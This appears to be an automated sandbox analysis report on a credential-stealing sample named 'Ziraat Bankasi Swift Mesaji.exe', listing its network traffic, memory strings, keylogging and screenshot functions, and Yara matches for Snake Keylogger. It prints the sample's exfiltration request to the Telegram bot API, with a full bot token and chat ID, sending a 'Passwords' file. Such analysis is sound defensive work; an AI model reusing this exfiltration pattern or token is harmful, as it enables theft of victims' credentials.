                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1ac31045a2d0Host: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4526506853.0000000000DA1000.00000004.00000020.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4540957522.00000000064EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4526506853.0000000000DA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/0
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4526506853.0000000000DA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/5
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4526506853.0000000000DA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4540957522.00000000064D7000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4540957522.0000000006490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?173bb04b490b1
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4540957522.0000000006490000.00000004.00000020.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4540957522.00000000064EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2703d692e4d0d
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4540957522.0000000006490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?580b29f95a34f
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4540957522.0000000006490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?a01b14f043ee6
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4526775129.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabAye-
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4526775129.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabO
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4540957522.0000000006490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2703d692e4
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
                Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49790 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49802 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49827 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49877 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49889 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49942 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49949 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49963 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49974 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49981 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49990 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50000 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50007 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50016 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50024 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50033 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50042 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50046 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50048 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50050 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50052 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50054 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50056 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50058 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50060 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50062 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50064 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50066 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50068 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50070 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50072 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50075 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50078 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50081 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50084 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50087 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50090 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50093 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50096 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50099 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50102 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50105 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50108 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50111 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to capture screen (.Net source)
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.raw.unpack, UltraSpeed.cs.Net Code: TakeScreenshot
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.raw.unpack, UltraSpeed.cs.Net Code: TakeScreenshot
                Contains functionality to log keystrokes (.Net Source)
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.Ziraat Bankasi Swift Mesaji.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.Ziraat Bankasi Swift Mesaji.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 6516, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 768, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_024CD4040_2_024CD404
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_04C56DC00_2_04C56DC0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_04C500400_2_04C50040
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_04C500060_2_04C50006
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_04C56DB20_2_04C56DB2
